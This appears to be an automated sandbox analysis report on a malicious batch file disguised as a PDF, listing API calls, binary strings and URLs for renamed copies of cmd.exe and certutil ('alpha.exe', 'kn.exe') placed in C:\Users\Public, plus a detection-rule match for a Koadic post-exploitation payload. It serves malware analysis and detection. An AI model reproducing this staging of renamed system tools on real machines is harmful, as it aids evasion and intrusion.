alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1662113881.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1665632845.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1671358819.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1673888416.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1677036261.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1674461532.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1681056621.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1679714950.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF755CC7B4C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exe Code function: 5_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF755CC7B4C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54CC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF6C54CC6F8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C553234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF6C553234C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5533100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6C5533100
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6C55310C4
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5536F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF6C5536F80
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5513674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF6C5513674
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF6C54DD4A4
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C549D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6C549D440
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6C54DB3D8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54D5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF6C54D5E58
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5531B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF6C5531B04
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55319F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6C55319F8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF6C54DDBC0
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exe Code function: 9_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF755CC7B4C
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CB823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF755CB823C
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CB2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF755CB2978
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CA35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF755CA35B8
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CA1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF755CA1560
Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF755CC7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF755CC7B4C
Source: kn.exe String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: kn.exe String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000006.00000000.1666357084.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000002.1669885259.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1673228008.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1671803447.00007FF6C556E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token

E-Banking Fraud

Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54AB684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,6_2_00007FF6C54AB684
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54B25E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF6C54B25E8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C552A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C552A740
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54EE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6C54EE1F8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C5526EA8 NCryptImportKey,#360,6_2_00007FF6C5526EA8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F0EF4 NCryptImportKey,#205,#359,#359,#357,6_2_00007FF6C54F0EF4
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54E0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,6_2_00007FF6C54E0F58
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54DEA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,6_2_00007FF6C54DEA7C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54B29A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6C54B29A0
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55298B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,6_2_00007FF6C55298B0
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54E184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,6_2_00007FF6C54E184C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C55293A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6C55293A0
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C54F342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6C54F342C
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C547F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,6_2_00007FF6C547F9B8
Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF6C548FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,6_2_00007FF6C548FC20

System Summary

Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLE Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
Source: 1x40 CONTAINER.PDF-.bat Static file information: 3675586
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB898C NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB898C NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C554C964 NtQuerySystemTime,RtlTimeToSecondsSince1970
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB898C NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\alpha.exe | Code function: 9_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB89E4 NtQueryInformationToken,NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CA3D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB898C NtQueryInformationToken
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CD1538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CCBCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB8114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB88C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
Source: C:\Users\Public\alpha.exe | Code function: 10_2_00007FF755CB7FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA5240 memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB4224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB0A6C
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CAAA54
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB5554
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB37D8
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CC7F00
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CCEE88
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CAE680
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA4A30
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CCAA30
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA2220
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA7650
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CAD250
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA9E50
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA5240
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CACE10
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA8DF8
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CCD9D0
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA81D4
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA7D30
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CAB0D8
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA8510
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB18D4
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA1884
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CB7854
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA2C48
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CCAC4C
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA6BE0
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA3410
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CCAFBC
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA5B70
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA3F90
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA372C
Source: C:\Users\Public\alpha.exe | Code function: 3_2_00007FF755CA9B50
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB0A6C
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB4224
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CAAA54
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB5554
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB37D8
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA6EE4
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CC7F00
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CCEE88
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CAE680
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA4A30
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CCAA30
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA2220
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA7650
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CAD250
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA9E50
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA5240
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CACE10
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA8DF8
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CCD9D0
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA81D4
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA7D30
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CD1538
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CAB0D8
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA8510
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB18D4
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA1884
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CB7854
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA2C48
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CCAC4C
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA6BE0
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA3410
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CCAFBC
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA5B70
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA3F90
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA372C
Source: C:\Users\Public\alpha.exe | Code function: 5_2_00007FF755CA9B50
Source: C:\Users\Public\kn.exe | Code function: 6_2_00007FF6C5462F38
